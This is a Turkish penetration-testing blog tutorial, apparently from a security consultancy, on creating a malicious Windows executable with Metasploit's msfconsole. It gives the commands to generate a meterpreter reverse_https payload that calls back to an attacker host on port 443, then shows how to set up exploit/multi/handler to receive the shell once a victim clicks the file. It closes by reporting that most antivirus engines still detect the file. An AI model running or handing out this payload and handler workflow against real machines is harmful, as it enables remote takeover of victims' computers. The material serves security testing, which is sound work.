Msfconsole Arayüzündeki Payload Seçeneği Kullanarak Zararlı Yazılım Oluşturma

0
1185
views
Sızma testleri sırasında anti-virüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfconsole arayüzündeki payload seçeneği kullanılarak anti-virüslere yakalanmayan zararlı bir uygulama oluşturulacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

VirusTotal sonuçlarından da görüleceği gibi, msfconsole içerisindeki payload seçeneği kullanılarak oluşturulan zararlı yazılımlar bir çok anti-virüs tarafından tespit edilebilmektedir. Üstelik, Metasploit Framework’te, msfpayload (ve msfencode modüllerine) destek çekilmiştir. Bu modüller yerine, MsfVenom ile zararlı yazılım oluşturulması tavsiye edilmektedir.

Zararlı bir exe uygulamasını oluşturmak için örnek bir komut aşağıdaki gibidir:

use payload/windows/meterpreter/reverse_https
set LHOST 192.168.0.130
set LPORT 443
set EXITFUNC process
generate -t exe -f /root/Desktop/ZararliUygulama.exe

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-01

Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.0.130
set LPORT 443
show options

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-02

Exploit işlemi başlatılır ve exe dosyasının tıklanması için beklenilir.

exploit -j

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-03

Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.

sessions -l

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-04

Hazırlanan zararlı uygulamanın, günümüzde bir çok anti-virüs tarafından yakalandığı görülmektedir. Virüs.mu (henüz internete açılmamıştır) tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir.

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-05

Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 37 tanesi tarafından yakalandığı görülmektedir.

evading-anti-virus-detection-using-payload-option-of-msfconsole-interface-06

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.